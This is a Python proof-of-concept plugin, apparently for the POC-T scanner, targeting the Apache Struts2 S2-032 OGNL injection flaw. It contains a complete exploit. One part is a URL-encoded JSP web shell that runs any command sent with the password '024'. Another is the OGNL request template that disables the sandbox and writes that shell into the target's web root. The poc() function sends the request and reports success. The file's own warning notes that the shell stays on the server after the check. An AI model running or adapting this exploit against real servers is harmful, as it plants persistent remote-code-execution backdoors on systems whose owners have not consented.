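# URL-encoded JSP that poc() writes onto the target.  Decoded, it is a
# command-execution web shell:
#
#   gif89a<%
#       if("024".equals(request.getParameter("pwd"))){
#           java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("l")).getInputStream();
#           ... streams the command's stdout back inside <pre>...</pre> ...
#       }
#   %>
#
# i.e. anyone who knows the path and sends ``?pwd=024&l=<cmd>`` gets RCE.
# The leading ``gif89a`` bytes are the GIF magic (presumably to look like an
# image to naive content sniffers; the script itself does not depend on it).
_S2032_SHELL_JSP = (
    'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.'
    'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2'
    '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%'
    '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre'
    'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B'
    '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt'
    'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C'
    'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din'
    '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20'
    '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2'
    '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%'
    '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
)

# S2-032 request template.  The ``method:`` action-name prefix is evaluated
# as OGNL; the injected expression (URL-decoded, ``%23`` == ``#``):
#
#   #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,   -- lift sandbox
#   #a=#parameters.reqobj[0], #c=#parameters.reqobj[1],
#   #req=#context.get(#a),                                    -- HttpServletRequest
#   #b=#req.getRealPath(#c)+#parameters.reqobj[2],            -- webroot + file name
#   #fos=new java.io.FileOutputStream(#b),
#   #fos.write(#parameters.content[0].getBytes()), #fos.close(),
#   #hh=#context.get(#parameters.rpsobj[0]),                  -- HttpServletResponse
#   #hh.getWriter().println(#b), flush(), close()             -- echo written path
#
# so ``reqobj`` carries three values: the request class key, ``/`` and the
# file name, and the response body is the absolute path that was written.
# Format fields: {url}, {filename}, {content}.
_S2032_URL_TEMPLATE = (
    "{url}?method:%23_memberAccess%3d@ognl.OgnlContext"
    "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],"
    "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),"
    "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23"
    "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para"
    "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte"
    "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23"
    "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x"
    "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch"
    "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch"
    "er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={"
    "content}"
)


def _build_exploit_url(url, jsp_file, content):
    """Return the full S2-032 GET URL for *url* that writes *content* to *jsp_file*.

    *jsp_file* is appended to the web root's real path on the target (it is
    ``reqobj[2]`` in the OGNL above), so it must be a bare file name.
    """
    # NOTE: the {filename} field was missing from the template on the page
    # this was reviewed from, leaving ``filename=jsp_file`` unused and the
    # response check below unsatisfiable; it is restored here.
    return _S2032_URL_TEMPLATE.format(url=url, filename=jsp_file, content=content)


def _looks_exploited(status_code, body, jsp_file):
    """Decide from the response whether the file write was echoed back.

    The OGNL prints the absolute path it wrote, so a 200 whose body contains
    our random file name is the success signal.  ``method:`` must *not* be in
    the body: that would mean the server merely reflected our raw query
    string (e.g. on an error page) instead of evaluating it.
    """
    return bool(status_code == 200 and jsp_file in body and 'method:' not in body)


def poc(url):
    """Probe *url* for Struts2 S2-032 (OGNL injection via the ``method:`` prefix).

    Sends one GET request whose action name carries OGNL that writes a
    randomly named ``.jsp`` into the target's web root and echoes the written
    path.  The host is reported vulnerable when the echoed path contains our
    random file name.

    Args:
        url: Target base URL.  A missing scheme defaults to ``http://``; any
            query string already present is discarded.

    Returns:
        ``True`` when the response proves the file was written, ``False`` for
        any other response and on *any* error (bad URL, DNS/connect failure,
        timeout) -- the POC-T convention of "not confirmed == not vulnerable".

    WARNING: this is not a read-only check.  On a vulnerable host it leaves a
    persistent command-execution web shell (``?pwd=024&l=<cmd>``) in the web
    root and never removes it, and the target prints the shell's absolute
    path in clear text over the wire.  Run only with explicit authorisation
    and delete the dropped file afterwards.
    """
    try:
        if '://' not in url:
            url = 'http://' + url
        # Drop any caller-supplied query string; the exploit supplies its own.
        url = url.split('?')[0]
        # Random name so the check cannot be satisfied by a pre-existing file
        # and repeated runs do not clobber each other.  random is fine here:
        # the name is not a secret -- the target echoes it back anyway.
        jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
        poc_url = _build_exploit_url(url, jsp_file, _S2032_SHELL_JSP)

        resp = requests.get(
            poc_url,
            headers={'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0'},
            timeout=10,
        )
        # .text rather than .content: on Python 3 .content is bytes, and
        # ``str in bytes`` raises TypeError, which the handler below would
        # silently turn into a false "not vulnerable".
        return _looks_exploited(resp.status_code, resp.text, jsp_file)
    except Exception:
        # Deliberate best-effort: the POC-T runner expects a bool, never an
        # exception, from a poc().
        return False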
